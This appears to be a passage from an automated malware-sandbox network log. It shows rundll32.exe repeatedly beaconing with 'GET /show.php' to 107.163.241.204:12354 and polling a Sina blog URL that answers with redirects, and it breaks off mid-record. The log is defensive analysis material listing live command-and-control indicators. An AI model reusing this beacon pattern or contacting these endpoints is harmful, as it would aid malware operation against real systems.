                                                      Dec 11, 2024 16:24:48.816800117 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      72 | 192.168.2.9 | 50517 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:50.576754093 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      73 | 192.168.2.9 | 50520 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:50.694227934 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:52.271370888 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:52 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      74 | 192.168.2.9 | 50521 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:50.696141958 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      75 | 192.168.2.9 | 50571 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:52.809834003 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      76 | 192.168.2.9 | 50574 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:52.939590931 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      77 | 192.168.2.9 | 50610 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:54.591496944 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      78 | 192.168.2.9 | 50614 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:54.710439920 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      79 | 192.168.2.9 | 50615 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:54.727915049 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:56.292313099 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      80 | 192.168.2.9 | 50675 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:56.906470060 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      81 | 192.168.2.9 | 50681 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:57.023998022 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      82 | 192.168.2.9 | 50726 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:58.762630939 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      83 | 192.168.2.9 | 50730 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:58.762767076 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      84 | 192.168.2.9 | 50731 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:58.762850046 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:00.326045036 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:00 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      85 | 192.168.2.9 | 50804 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:00.979048014 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      86 | 192.168.2.9 | 50810 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:01.095097065 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      87 | 192.168.2.9 | 50858 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:02.944627047 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      88 | 192.168.2.9 | 50861 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:03.081012011 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      89 | 192.168.2.9 | 50862 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:03.089596987 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:04.663110971 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:04 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      90 | 192.168.2.9 | 50959 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:05.187299013 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      91 | 192.168.2.9 | 50969 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:05.310873985 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      92 | 192.168.2.9 | 51054 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:07.076435089 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      93 | 192.168.2.9 | 51059 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:07.195472956 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      94 | 192.168.2.9 | 51060 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:07.196517944 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:08.789449930 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:08 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      95 | 192.168.2.9 | 51165 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:09.309463024 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      96 | 192.168.2.9 | 51174 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:09.444801092 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      97 | 192.168.2.9 | 51270 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:11.075556993 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      98 | 192.168.2.9 | 51280 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:11.214385033 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:12.778274059 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:12 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      99 | 192.168.2.9 | 51281 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:11.311927080 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      100 | 192.168.2.9 | 51398 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:13.324873924 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      101 | 192.168.2.9 | 51413 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:13.550810099 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      102 | 192.168.2.9 | 51518 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:15.216516018 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      103 | 192.168.2.9 | 51526 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:15.328713894 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      104 | 192.168.2.9 | 51528 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:15.350385904 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:16.914438009 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:16 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      105 | 192.168.2.9 | 51647 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:17.465831995 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      106 | 192.168.2.9 | 51656 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:17.579092026 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      107 | 192.168.2.9 | 51746 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:19.232347965 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      108 | 192.168.2.9 | 51754 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:19.350450039 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      109 | 192.168.2.9 | 51755 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:19.350764990 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:20.919367075 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:20 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      110 | 192.168.2.9 | 51887 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:21.482290983 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      111 | 192.168.2.9 | 51895 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:21.605012894 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      112 | 192.168.2.9 | 53096 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:23.250932932 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      113 | 192.168.2.9 | 53196 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:23.370752096 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      114 | 192.168.2.9 | 53200 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:23.378680944 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:25.004707098 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:24 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      115 | 192.168.2.9 | 55196 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:25.520596981 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      116 | 192.168.2.9 | 55373 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:25.643363953 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      117 | 192.168.2.9 | 56825 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:25:27.264153957 CET | 184 | OUT | GET /show.php HTTP/1.1
